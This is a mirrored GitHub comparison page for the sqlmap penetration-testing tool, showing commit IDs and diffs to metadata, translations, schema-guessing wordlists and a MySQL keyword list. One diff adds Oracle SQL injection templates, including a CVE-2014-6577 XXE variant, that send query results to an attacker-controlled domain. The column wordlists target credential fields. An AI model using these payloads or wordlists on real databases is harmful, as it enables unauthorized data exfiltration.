mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-06 20:51:31 +00:00
Compare commits
249 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
f94ab0f650 | ||
|
|
585a13d89b | ||
|
|
c84f141b89 | ||
|
097f236a50 | ||
|
|
51908e653c | ||
|
|
a13c1f2db1 | ||
|
|
f176266e58 | ||
|
|
53b8a9583e | ||
|
|
6dd383fd72 | ||
|
|
f24bf55d8f | ||
|
|
c096f870e7 | ||
|
|
bde7637633 | ||
|
|
4acc0178b5 | ||
|
de6107cab5 | ||
|
|
29f09e235c | ||
|
|
67ab79a625 | ||
|
|
de66b69f41 | ||
|
|
acce97bfcb | ||
|
|
124c3902cc | ||
|
|
bb1772c8b8 | ||
|
|
9d85d3005a | ||
|
|
7a6abb56d2 | ||
|
e267c8fd57 | ||
|
|
57900d899c | ||
|
|
3d244ea9c3 | ||
|
|
90cbaa1249 | ||
|
|
1740f6332e | ||
|
|
e0ec2fcdbd | ||
|
|
c629374858 | ||
|
|
6caba631a8 | ||
|
|
be118e861c | ||
|
|
4f2a883544 | ||
|
|
89e8b6e5ce | ||
|
|
6d472dc2b0 | ||
|
2f66aa8ac1 | ||
|
|
a7cf68f243 | ||
|
|
ccc38abff6 | ||
|
|
3e98fabd23 | ||
|
|
b368b4a9f9 | ||
|
|
2c767d7d1f | ||
|
|
b836c36d68 | ||
|
|
89f9e5b1e0 | ||
|
|
5ad099c61d | ||
|
|
21878560ee | ||
|
|
0d19af8bbc | ||
|
|
5bd0f20c84 | ||
|
|
bb48dd037f | ||
|
|
df388b2150 | ||
|
|
66cc6ae55c | ||
|
|
322d80c0cf | ||
|
|
1230e57fca | ||
|
|
ee15749ac4 | ||
|
|
8466a89ed3 | ||
|
|
acc7b16845 | ||
|
48c967c01d | ||
|
|
d28a66a340 | ||
|
|
30b43eccab | ||
|
|
290a8e7119 | ||
|
|
cf5e2aa7ef | ||
|
|
8bc2ace094 | ||
|
e1043173d7 | ||
|
|
12c472cef5 | ||
|
|
037a07ddde | ||
|
|
0e8940b0be | ||
|
|
3ad6727d0c | ||
|
4191b06f58 | ||
|
|
60bb973c11 | ||
|
|
0fba9b13b3 | ||
|
|
17688f6711 | ||
|
|
3b3c2a5d04 | ||
|
|
4f7614412f | ||
|
|
4efb3ea840 | ||
|
|
c2bac51c4f | ||
|
|
7d763e224a | ||
|
|
4dd362cb2c | ||
|
|
077d58c5e9 | ||
|
|
257c4d1c88 | ||
|
|
ce30fa08d6 | ||
|
3ca2533c39 | ||
|
|
75bfebed9d | ||
|
|
3117730d84 | ||
|
|
323af987ed | ||
|
|
80dc67f85a | ||
|
|
ca2f094e4a | ||
|
|
3aa6692b82 | ||
|
|
aabfcbc3e1 | ||
|
|
d42174e8a0 | ||
|
|
a1bf89d31e | ||
|
|
99ea44c7b3 | ||
|
|
abc092959f | ||
|
|
d5547d908c | ||
|
|
25fe5dce21 | ||
|
|
1f82d9587a | ||
|
|
15d9c8f9ed | ||
|
|
01310a47fd | ||
|
|
56177c3d2a | ||
|
|
c5d7c542a2 | ||
|
|
4357b0087d | ||
|
|
d3bfe59401 | ||
|
|
9eb970e7c7 | ||
|
|
46495f70f8 | ||
|
|
30ba167cc1 | ||
|
|
d7180d38c4 | ||
|
|
b1aaac5ba2 | ||
|
8962e152ac | ||
|
c58383e684 | ||
|
|
4585243175 | ||
|
|
fbfed061b8 | ||
|
|
fdbc323aa6 | ||
|
|
6336389322 | ||
|
|
a7b59243e2 | ||
|
|
c8eea24ac4 | ||
|
|
1be7a5aea8 | ||
|
|
d0d4cf4f6d | ||
|
|
1f83076e70 | ||
|
|
b0a1efaa44 | ||
|
|
de527f1814 | ||
|
|
96adc7c098 | ||
|
|
7940b572ef | ||
|
|
05293e01a4 | ||
|
|
216565fb05 | ||
|
|
6e3eaca547 | ||
|
5592f55cae | ||
|
12e3ed14ae | ||
|
|
dd4010f16f | ||
|
|
4cd146cc86 | ||
|
|
e85bc30f95 | ||
|
|
b7411211af | ||
|
|
a11f79e16f | ||
|
|
7c9e4c4a65 | ||
|
|
76202e565d | ||
|
|
86ac3025ed | ||
|
|
ebaee3a4e6 | ||
|
|
33a6547f5b | ||
|
|
ad529f24cb | ||
|
|
3d2f89345f | ||
|
|
58f10093a0 | ||
|
|
6aaf7d3960 | ||
|
|
b8fa0edea6 | ||
|
|
55b2b43f0e | ||
|
|
7bc0b08fd6 | ||
|
|
62bba470d6 | ||
|
|
eda669e10b | ||
|
c382321134 | ||
|
|
2ace4ef471 | ||
|
|
02dcf2a926 | ||
|
5c55602296 | ||
|
|
aa9cc3987e | ||
|
|
d7ee423fc5 | ||
|
|
1092dfb877 | ||
|
|
bf4f84b70a | ||
|
|
c45cf60fb4 | ||
|
|
3f53b2bc05 | ||
|
|
9c103b3dd6 | ||
|
7f62572f43 | ||
|
|
e846209b87 | ||
|
|
a246b8da5e | ||
|
|
70665c5d2b | ||
|
111620e395 | ||
|
|
2382d2654e | ||
|
|
4cdc3af585 | ||
|
|
212f28d1ad | ||
|
|
e1f7690de4 | ||
|
|
7e425d4c9b | ||
|
|
fe2042ea58 | ||
|
|
54e953d206 | ||
|
|
8c26c67ce9 | ||
|
c722f8e3bd | ||
|
|
521da5e734 | ||
|
|
43fba39366 | ||
|
|
afdaba76dc | ||
|
|
d98d64504c | ||
|
|
290058451d | ||
|
|
e7372a9512 | ||
|
864ab597c0 | ||
|
|
e8731e1af5 | ||
|
|
df4293473d | ||
|
|
90b444c927 | ||
|
|
99f07b64c5 | ||
|
|
07ae377987 | ||
|
|
4a355b99be | ||
|
|
7008361017 | ||
|
|
a14a3d0e54 | ||
|
3aae1849bb | ||
|
|
7d07976969 | ||
|
|
9dc1344478 | ||
|
|
e8e7d66356 | ||
|
|
2038512518 | ||
|
|
184454ba8e | ||
|
|
aacb360d46 | ||
|
|
5eaf1d2d27 | ||
|
|
be987815c9 | ||
|
|
fb3f428804 | ||
|
|
52f2faf2cf | ||
|
|
d5fb92ee42 | ||
|
|
cd76f8863b | ||
|
|
5b2c0f0d46 | ||
|
|
548d98e0af | ||
|
68c2180c59 | ||
|
|
e2f48a9346 | ||
|
|
582bb2fec9 | ||
|
|
9bdad4bcd5 | ||
|
|
e1a04a8201 | ||
|
|
7149991faf | ||
|
32acb1e4ff | ||
|
|
e91b1a0f97 | ||
|
|
439d1cce67 | ||
|
|
dcf304c65e | ||
|
|
f5ed2c0c97 | ||
|
|
dd55d97f77 | ||
|
|
445d69f678 | ||
|
|
02ff0eef88 | ||
|
|
acd5ef055a | ||
|
|
a2fcab448c | ||
|
|
0b775b6d1d | ||
|
|
b1881129b6 | ||
|
|
acae6e3e7c | ||
|
|
bacf18832a | ||
|
|
75905e0cd9 | ||
|
|
6aa4d9bdf1 | ||
|
|
90eeab68b9 | ||
|
|
22168204c2 | ||
|
|
63977ebdff | ||
|
|
e393e1b80e | ||
|
a4cf25c97d | ||
|
796173f81c | ||
|
|
5e18bf81b9 | ||
|
|
74f5518e62 | ||
|
|
74ecc72588 | ||
|
|
292cc5fe59 | ||
|
|
b528fc07f9 | ||
|
25d6479f91 | ||
|
|
8bcaed171a | ||
|
|
22e7b35ef4 | ||
|
|
067c3bc353 | ||
|
|
4d9dbdb36d | ||
|
|
309d08850f | ||
|
|
3b07b70864 | ||
|
|
97b88b0949 | ||
|
|
cb8861fde8 | ||
|
|
519c0ac01b | ||
|
|
6276db1d80 | ||
|
|
3c9f55b5d5 | ||
|
|
7d5883f1ed | ||
|
|
0de0fa047e | ||
|
|
477ffd848a | ||
|
|
1d8643db09 | ||
|
|
122c47146d | ||
|
|
92b065276f |
2
.github/FUNDING.yml
vendored
2
.github/FUNDING.yml
vendored
@@ -1 +1 @@
|
||||
custom: 'https://www.paypal.com/donate?hosted_button_id=A34GMDLKA2V7G'
|
||||
github: sqlmapproject
|
||||
|
||||
8
.github/ISSUE_TEMPLATE/bug_report.md
vendored
8
.github/ISSUE_TEMPLATE/bug_report.md
vendored
@@ -21,10 +21,10 @@ A clear and concise description of what you expected to happen.
|
||||
If applicable, add screenshots to help explain your problem.
|
||||
|
||||
**Running environment:**
|
||||
- sqlmap version [e.g. 1.3.5.93#dev]
|
||||
- Installation method [e.g. git]
|
||||
- Operating system: [e.g. Microsoft Windows 10]
|
||||
- Python version [e.g. 3.5.2]
|
||||
- sqlmap version [e.g. 1.7.2.12#dev]
|
||||
- Installation method [e.g. pip]
|
||||
- Operating system: [e.g. Microsoft Windows 11]
|
||||
- Python version [e.g. 3.11.2]
|
||||
|
||||
**Target details:**
|
||||
- DBMS [e.g. Microsoft SQL Server]
|
||||
|
||||
2
.github/workflows/tests.yml
vendored
2
.github/workflows/tests.yml
vendored
@@ -10,7 +10,7 @@ jobs:
|
||||
strategy:
|
||||
matrix:
|
||||
os: [ubuntu-latest, macos-latest, windows-latest]
|
||||
python-version: [ '2.x', '3.10', 'pypy-2.7', 'pypy-3.7' ]
|
||||
python-version: [ '3.11', 'pypy-2.7', 'pypy-3.7' ]
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: Set up Python
|
||||
|
||||
2
LICENSE
2
LICENSE
@@ -1,7 +1,7 @@
|
||||
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
||||
of the GNU General Public License (GPL) is appended to this file.
|
||||
|
||||
sqlmap is (C) 2006-2021 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||
sqlmap is (C) 2006-2024 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||
|
||||
This program is free software; you may redistribute and/or modify it under
|
||||
the terms of the GNU General Public License as published by the Free
|
||||
|
||||
@@ -55,9 +55,12 @@ Translations
|
||||
* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
|
||||
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
|
||||
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
|
||||
* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md)
|
||||
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
|
||||
* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-GER.md)
|
||||
* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md)
|
||||
* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md)
|
||||
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
|
||||
* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md)
|
||||
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
||||
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
|
||||
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
||||
@@ -65,8 +68,9 @@ Translations
|
||||
* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)
|
||||
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
|
||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
|
||||
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md)
|
||||
* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
|
||||
* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
|
||||
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
||||
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
||||
* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
<!DOCTYPE html>
|
||||
|
||||
<!-- http://angrytools.com/bootstrap/editor/ -->
|
||||
<!-- https://angrytools.com/bootstrap/editor/ -->
|
||||
|
||||
<html lang="en">
|
||||
<head>
|
||||
|
||||
@@ -1,2 +1,3 @@
|
||||
SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
|
||||
# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
|
||||
# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
id
|
||||
@@ -1844,6 +1844,10 @@ banner_id
|
||||
error
|
||||
language_id
|
||||
val
|
||||
parol
|
||||
familiya
|
||||
imya
|
||||
otchestvo
|
||||
|
||||
# site:jp
|
||||
|
||||
@@ -2731,6 +2735,34 @@ ssn
|
||||
account
|
||||
confidential
|
||||
|
||||
# site:nl
|
||||
|
||||
naam
|
||||
straat
|
||||
gemeente
|
||||
beschrijving
|
||||
id_gebruiker
|
||||
gebruiker_id
|
||||
gebruikersnaam
|
||||
wachtwoord
|
||||
telefoon
|
||||
voornaam
|
||||
achternaam
|
||||
geslacht
|
||||
huisnummer
|
||||
gemeente
|
||||
leeftijd
|
||||
|
||||
# site:cn
|
||||
|
||||
yonghuming
|
||||
mima
|
||||
xingming
|
||||
xingbie
|
||||
touxiang
|
||||
youxiang
|
||||
shouji
|
||||
|
||||
# Misc
|
||||
|
||||
u_pass
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# CTFs
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
[Banners]
|
||||
@@ -399,6 +399,7 @@ XDBWEBSERVICES
|
||||
|
||||
# MySQL
|
||||
information_schema
|
||||
performance_schema
|
||||
mysql
|
||||
phpmyadmin
|
||||
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
users
|
||||
@@ -3578,3 +3578,11 @@ users
|
||||
user_usergroup_map
|
||||
viewlevels
|
||||
weblinks
|
||||
|
||||
# site:nl
|
||||
|
||||
gebruikers
|
||||
|
||||
# site:cn
|
||||
|
||||
yonghu
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
|
||||
@@ -452,6 +452,762 @@ WRITEXOR
|
||||
YEAR_MONTH
|
||||
ZEROFILL
|
||||
|
||||
# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html)
|
||||
|
||||
ACCESSIBLE
|
||||
ACCOUNT
|
||||
ACTION
|
||||
ACTIVE
|
||||
ADD
|
||||
ADMIN
|
||||
AFTER
|
||||
AGAINST
|
||||
AGGREGATE
|
||||
ALGORITHM
|
||||
ALL
|
||||
ALTER
|
||||
ALWAYS
|
||||
ANALYSE
|
||||
ANALYZE
|
||||
AND
|
||||
ANY
|
||||
ARRAY
|
||||
AS
|
||||
ASC
|
||||
ASCII
|
||||
ASENSITIVE
|
||||
AT
|
||||
ATTRIBUTE
|
||||
AUTHENTICATION
|
||||
AUTOEXTEND_SIZE
|
||||
AUTO_INCREMENT
|
||||
AVG
|
||||
AVG_ROW_LENGTH
|
||||
BACKUP
|
||||
BEFORE
|
||||
BEGIN
|
||||
BETWEEN
|
||||
BIGINT
|
||||
BINARY
|
||||
BINLOG
|
||||
BIT
|
||||
BLOB
|
||||
BLOCK
|
||||
BOOL
|
||||
BOOLEAN
|
||||
BOTH
|
||||
BTREE
|
||||
BUCKETS
|
||||
BULK
|
||||
BY
|
||||
BYTE
|
||||
CACHE
|
||||
CALL
|
||||
CASCADE
|
||||
CASCADED
|
||||
CASE
|
||||
CATALOG_NAME
|
||||
CHAIN
|
||||
CHALLENGE_RESPONSE
|
||||
CHANGE
|
||||
CHANGED
|
||||
CHANNEL
|
||||
CHAR
|
||||
CHARACTER
|
||||
CHARSET
|
||||
CHECK
|
||||
CHECKSUM
|
||||
CIPHER
|
||||
CLASS_ORIGIN
|
||||
CLIENT
|
||||
CLONE
|
||||
CLOSE
|
||||
COALESCE
|
||||
CODE
|
||||
COLLATE
|
||||
COLLATION
|
||||
COLUMN
|
||||
COLUMNS
|
||||
COLUMN_FORMAT
|
||||
COLUMN_NAME
|
||||
COMMENT
|
||||
COMMIT
|
||||
COMMITTED
|
||||
COMPACT
|
||||
COMPLETION
|
||||
COMPONENT
|
||||
COMPRESSED
|
||||
COMPRESSION
|
||||
CONCURRENT
|
||||
CONDITION
|
||||
CONNECTION
|
||||
CONSISTENT
|
||||
CONSTRAINT
|
||||
CONSTRAINT_CATALOG
|
||||
CONSTRAINT_NAME
|
||||
CONSTRAINT_SCHEMA
|
||||
CONTAINS
|
||||
CONTEXT
|
||||
CONTINUE
|
||||
CONVERT
|
||||
CPU
|
||||
CREATE
|
||||
CROSS
|
||||
CUBE
|
||||
CUME_DIST
|
||||
CURRENT
|
||||
CURRENT_DATE
|
||||
CURRENT_TIME
|
||||
CURRENT_TIMESTAMP
|
||||
CURRENT_USER
|
||||
CURSOR
|
||||
CURSOR_NAME
|
||||
DATA
|
||||
DATABASE
|
||||
DATABASES
|
||||
DATAFILE
|
||||
DATE
|
||||
DATETIME
|
||||
DAY
|
||||
DAY_HOUR
|
||||
DAY_MICROSECOND
|
||||
DAY_MINUTE
|
||||
DAY_SECOND
|
||||
DEALLOCATE
|
||||
DEC
|
||||
DECIMAL
|
||||
DECLARE
|
||||
DEFAULT
|
||||
DEFAULT_AUTH
|
||||
DEFINER
|
||||
DEFINITION
|
||||
DELAYED
|
||||
DELAY_KEY_WRITE
|
||||
DELETE
|
||||
DENSE_RANK
|
||||
DESC
|
||||
DESCRIBE
|
||||
DESCRIPTION
|
||||
DES_KEY_FILE
|
||||
DETERMINISTIC
|
||||
DIAGNOSTICS
|
||||
DIRECTORY
|
||||
DISABLE
|
||||
DISCARD
|
||||
DISK
|
||||
DISTINCT
|
||||
DISTINCTROW
|
||||
DIV
|
||||
DO
|
||||
DOUBLE
|
||||
DROP
|
||||
DUAL
|
||||
DUMPFILE
|
||||
DUPLICATE
|
||||
DYNAMIC
|
||||
EACH
|
||||
ELSE
|
||||
ELSEIF
|
||||
EMPTY
|
||||
ENABLE
|
||||
ENCLOSED
|
||||
ENCRYPTION
|
||||
END
|
||||
ENDS
|
||||
ENFORCED
|
||||
ENGINE
|
||||
ENGINES
|
||||
ENGINE_ATTRIBUTE
|
||||
ENUM
|
||||
ERROR
|
||||
ERRORS
|
||||
ESCAPE
|
||||
ESCAPED
|
||||
EVENT
|
||||
EVENTS
|
||||
EVERY
|
||||
EXCEPT
|
||||
EXCHANGE
|
||||
EXCLUDE
|
||||
EXECUTE
|
||||
EXISTS
|
||||
EXIT
|
||||
EXPANSION
|
||||
EXPIRE
|
||||
EXPLAIN
|
||||
EXPORT
|
||||
EXTENDED
|
||||
EXTENT_SIZE
|
||||
FACTOR
|
||||
FAILED_LOGIN_ATTEMPTS
|
||||
FALSE
|
||||
FAST
|
||||
FAULTS
|
||||
FETCH
|
||||
FIELDS
|
||||
FILE
|
||||
FILE_BLOCK_SIZE
|
||||
FILTER
|
||||
FINISH
|
||||
FIRST
|
||||
FIRST_VALUE
|
||||
FIXED
|
||||
FLOAT
|
||||
FLOAT4
|
||||
FLOAT8
|
||||
FLUSH
|
||||
FOLLOWING
|
||||
FOLLOWS
|
||||
FOR
|
||||
FORCE
|
||||
FOREIGN
|
||||
FORMAT
|
||||
FOUND
|
||||
FROM
|
||||
FULL
|
||||
FULLTEXT
|
||||
FUNCTION
|
||||
GENERAL
|
||||
GENERATE
|
||||
GENERATED
|
||||
GEOMCOLLECTION
|
||||
GEOMETRY
|
||||
GEOMETRYCOLLECTION
|
||||
GET
|
||||
GET_FORMAT
|
||||
GET_MASTER_PUBLIC_KEY
|
||||
GET_SOURCE_PUBLIC_KEY
|
||||
GLOBAL
|
||||
GRANT
|
||||
GRANTS
|
||||
GROUP
|
||||
GROUPING
|
||||
GROUPS
|
||||
GROUP_REPLICATION
|
||||
GTID_ONLY
|
||||
HANDLER
|
||||
HASH
|
||||
HAVING
|
||||
HELP
|
||||
HIGH_PRIORITY
|
||||
HISTOGRAM
|
||||
HISTORY
|
||||
HOST
|
||||
HOSTS
|
||||
HOUR
|
||||
HOUR_MICROSECOND
|
||||
HOUR_MINUTE
|
||||
HOUR_SECOND
|
||||
IDENTIFIED
|
||||
IF
|
||||
IGNORE
|
||||
IGNORE_SERVER_IDS
|
||||
IMPORT
|
||||
IN
|
||||
INACTIVE
|
||||
INDEX
|
||||
INDEXES
|
||||
INFILE
|
||||
INITIAL
|
||||
INITIAL_SIZE
|
||||
INITIATE
|
||||
INNER
|
||||
INOUT
|
||||
INSENSITIVE
|
||||
INSERT
|
||||
INSERT_METHOD
|
||||
INSTALL
|
||||
INSTANCE
|
||||
INT
|
||||
INT1
|
||||
INT2
|
||||
INT3
|
||||
INT4
|
||||
INT8
|
||||
INTEGER
|
||||
INTERSECT
|
||||
INTERVAL
|
||||
INTO
|
||||
INVISIBLE
|
||||
INVOKER
|
||||
IO
|
||||
IO_AFTER_GTIDS
|
||||
IO_BEFORE_GTIDS
|
||||
IO_THREAD
|
||||
IPC
|
||||
IS
|
||||
ISOLATION
|
||||
ISSUER
|
||||
ITERATE
|
||||
JOIN
|
||||
JSON
|
||||
JSON_TABLE
|
||||
JSON_VALUE
|
||||
KEY
|
||||
KEYRING
|
||||
KEYS
|
||||
KEY_BLOCK_SIZE
|
||||
KILL
|
||||
LAG
|
||||
LANGUAGE
|
||||
LAST
|
||||
LAST_VALUE
|
||||
LATERAL
|
||||
LEAD
|
||||
LEADING
|
||||
LEAVE
|
||||
LEAVES
|
||||
LEFT
|
||||
LESS
|
||||
LEVEL
|
||||
LIKE
|
||||
LIMIT
|
||||
LINEAR
|
||||
LINES
|
||||
LINESTRING
|
||||
LIST
|
||||
LOAD
|
||||
LOCAL
|
||||
LOCALTIME
|
||||
LOCALTIMESTAMP
|
||||
LOCK
|
||||
LOCKED
|
||||
LOCKS
|
||||
LOGFILE
|
||||
LOGS
|
||||
LONG
|
||||
LONGBLOB
|
||||
LONGTEXT
|
||||
LOOP
|
||||
LOW_PRIORITY
|
||||
MASTER
|
||||
MASTER_AUTO_POSITION
|
||||
MASTER_BIND
|
||||
MASTER_COMPRESSION_ALGORITHMS
|
||||
MASTER_CONNECT_RETRY
|
||||
MASTER_DELAY
|
||||
MASTER_HEARTBEAT_PERIOD
|
||||
MASTER_HOST
|
||||
MASTER_LOG_FILE
|
||||
MASTER_LOG_POS
|
||||
MASTER_PASSWORD
|
||||
MASTER_PORT
|
||||
MASTER_PUBLIC_KEY_PATH
|
||||
MASTER_RETRY_COUNT
|
||||
MASTER_SERVER_ID
|
||||
MASTER_SSL
|
||||
MASTER_SSL_CA
|
||||
MASTER_SSL_CAPATH
|
||||
MASTER_SSL_CERT
|
||||
MASTER_SSL_CIPHER
|
||||
MASTER_SSL_CRL
|
||||
MASTER_SSL_CRLPATH
|
||||
MASTER_SSL_KEY
|
||||
MASTER_SSL_VERIFY_SERVER_CERT
|
||||
MASTER_TLS_CIPHERSUITES
|
||||
MASTER_TLS_VERSION
|
||||
MASTER_USER
|
||||
MASTER_ZSTD_COMPRESSION_LEVEL
|
||||
MATCH
|
||||
MAXVALUE
|
||||
MAX_CONNECTIONS_PER_HOUR
|
||||
MAX_QUERIES_PER_HOUR
|
||||
MAX_ROWS
|
||||
MAX_SIZE
|
||||
MAX_UPDATES_PER_HOUR
|
||||
MAX_USER_CONNECTIONS
|
||||
MEDIUM
|
||||
MEDIUMBLOB
|
||||
MEDIUMINT
|
||||
MEDIUMTEXT
|
||||
MEMBER
|
||||
MEMORY
|
||||
MERGE
|
||||
MESSAGE_TEXT
|
||||
MICROSECOND
|
||||
MIDDLEINT
|
||||
MIGRATE
|
||||
MINUTE
|
||||
MINUTE_MICROSECOND
|
||||
MINUTE_SECOND
|
||||
MIN_ROWS
|
||||
MOD
|
||||
MODE
|
||||
MODIFIES
|
||||
MODIFY
|
||||
MONTH
|
||||
MULTILINESTRING
|
||||
MULTIPOINT
|
||||
MULTIPOLYGON
|
||||
MUTEX
|
||||
MYSQL_ERRNO
|
||||
NAME
|
||||
NAMES
|
||||
NATIONAL
|
||||
NATURAL
|
||||
NCHAR
|
||||
NDB
|
||||
NDBCLUSTER
|
||||
NESTED
|
||||
NETWORK_NAMESPACE
|
||||
NEVER
|
||||
NEW
|
||||
NEXT
|
||||
NO
|
||||
NODEGROUP
|
||||
NONE
|
||||
NOT
|
||||
NOWAIT
|
||||
NO_WAIT
|
||||
NO_WRITE_TO_BINLOG
|
||||
NTH_VALUE
|
||||
NTILE
|
||||
NULL
|
||||
NULLS
|
||||
NUMBER
|
||||
NUMERIC
|
||||
NVARCHAR
|
||||
OF
|
||||
OFF
|
||||
OFFSET
|
||||
OJ
|
||||
OLD
|
||||
ON
|
||||
ONE
|
||||
ONLY
|
||||
OPEN
|
||||
OPTIMIZE
|
||||
OPTIMIZER_COSTS
|
||||
OPTION
|
||||
OPTIONAL
|
||||
OPTIONALLY
|
||||
OPTIONS
|
||||
OR
|
||||
ORDER
|
||||
ORDINALITY
|
||||
ORGANIZATION
|
||||
OTHERS
|
||||
OUT
|
||||
OUTER
|
||||
OUTFILE
|
||||
OVER
|
||||
OWNER
|
||||
PACK_KEYS
|
||||
PAGE
|
||||
PARSER
|
||||
PARTIAL
|
||||
PARTITION
|
||||
PARTITIONING
|
||||
PARTITIONS
|
||||
PASSWORD_LOCK_TIME
|
||||
PATH
|
||||
PERCENT_RANK
|
||||
PERSIST
|
||||
PERSIST_ONLY
|
||||
PHASE
|
||||
PLUGIN
|
||||
PLUGINS
|
||||
PLUGIN_DIR
|
||||
POINT
|
||||
POLYGON
|
||||
PORT
|
||||
PRECEDES
|
||||
PRECEDING
|
||||
PRECISION
|
||||
PREPARE
|
||||
PRESERVE
|
||||
PREV
|
||||
PRIMARY
|
||||
PRIVILEGES
|
||||
PRIVILEGE_CHECKS_USER
|
||||
PROCEDURE
|
||||
PROCESS
|
||||
PROCESSLIST
|
||||
PROFILE
|
||||
PROFILES
|
||||
PROXY
|
||||
PURGE
|
||||
QUARTER
|
||||
QUERY
|
||||
QUICK
|
||||
RANDOM
|
||||
RANGE
|
||||
RANK
|
||||
READ
|
||||
READS
|
||||
READ_ONLY
|
||||
READ_WRITE
|
||||
REAL
|
||||
REBUILD
|
||||
RECOVER
|
||||
RECURSIVE
|
||||
REDOFILE
|
||||
REDO_BUFFER_SIZE
|
||||
REDUNDANT
|
||||
REFERENCE
|
||||
REFERENCES
|
||||
REGEXP
|
||||
REGISTRATION
|
||||
RELAY
|
||||
RELAYLOG
|
||||
RELAY_LOG_FILE
|
||||
RELAY_LOG_POS
|
||||
RELAY_THREAD
|
||||
RELEASE
|
||||
RELOAD
|
||||
REMOTE
|
||||
REMOVE
|
||||
RENAME
|
||||
REORGANIZE
|
||||
REPAIR
|
||||
REPEAT
|
||||
REPEATABLE
|
||||
REPLACE
|
||||
REPLICA
|
||||
REPLICAS
|
||||
REPLICATE_DO_DB
|
||||
REPLICATE_DO_TABLE
|
||||
REPLICATE_IGNORE_DB
|
||||
REPLICATE_IGNORE_TABLE
|
||||
REPLICATE_REWRITE_DB
|
||||
REPLICATE_WILD_DO_TABLE
|
||||
REPLICATE_WILD_IGNORE_TABLE
|
||||
REPLICATION
|
||||
REQUIRE
|
||||
REQUIRE_ROW_FORMAT
|
||||
RESET
|
||||
RESIGNAL
|
||||
RESOURCE
|
||||
RESPECT
|
||||
RESTART
|
||||
RESTORE
|
||||
RESTRICT
|
||||
RESUME
|
||||
RETAIN
|
||||
RETURN
|
||||
RETURNED_SQLSTATE
|
||||
RETURNING
|
||||
RETURNS
|
||||
REUSE
|
||||
REVERSE
|
||||
REVOKE
|
||||
RIGHT
|
||||
RLIKE
|
||||
ROLE
|
||||
ROLLBACK
|
||||
